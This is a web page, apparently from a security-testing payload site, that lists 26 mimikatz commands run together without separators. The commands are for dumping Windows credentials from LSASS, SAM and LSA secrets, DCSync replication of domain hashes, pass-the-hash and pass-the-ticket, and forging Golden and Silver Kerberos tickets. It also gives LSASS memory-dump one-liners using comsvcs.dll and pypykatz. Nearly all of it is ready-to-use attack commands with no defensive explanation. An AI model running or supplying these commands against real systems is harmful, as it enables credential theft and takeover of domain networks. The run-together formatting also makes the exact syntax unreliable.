$loading...
Complete mimikatz reference for credential dumping, Pass-the-Hash, Pass-the-Ticket, Golden/Silver Tickets, and DCSync attacks. (26 payloads)
privilege::debugtoken::elevatemisc::cmdlog /userlogfile.txtsekurlsa::logonpasswordssekurlsa::wdigestsekurlsa::ekeyssekurlsa::credmanlsadump::samlsadump::secretslsadump::cachelsadump::dcsync /domain:corp.local /user:Administratorlsadump::dcsync /domain:corp.local /all /csvsekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NTLM_HASH> /run:cmd.exesekurlsa::pth /user:admin /domain:. /ntlm:<NTLM> /run:"mstsc.exe /restrictedadmin"kerberos::list /exportkerberos::ptt ticket.kirbikerberos::purgekerberos::tgtkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<NTLM> /ticket:golden.kirbikerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:server.corp.local /service:cifs /rc4:<hash> /ticket:silver.kirbilsadump::dcsync /user:krbtgt # Get krbtgt hash firstTask Manager → Details → lsass.exe → Create dump filerundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id lsass.dmp fullmimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exitpypykatz lsa minidump lsass.dmpLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides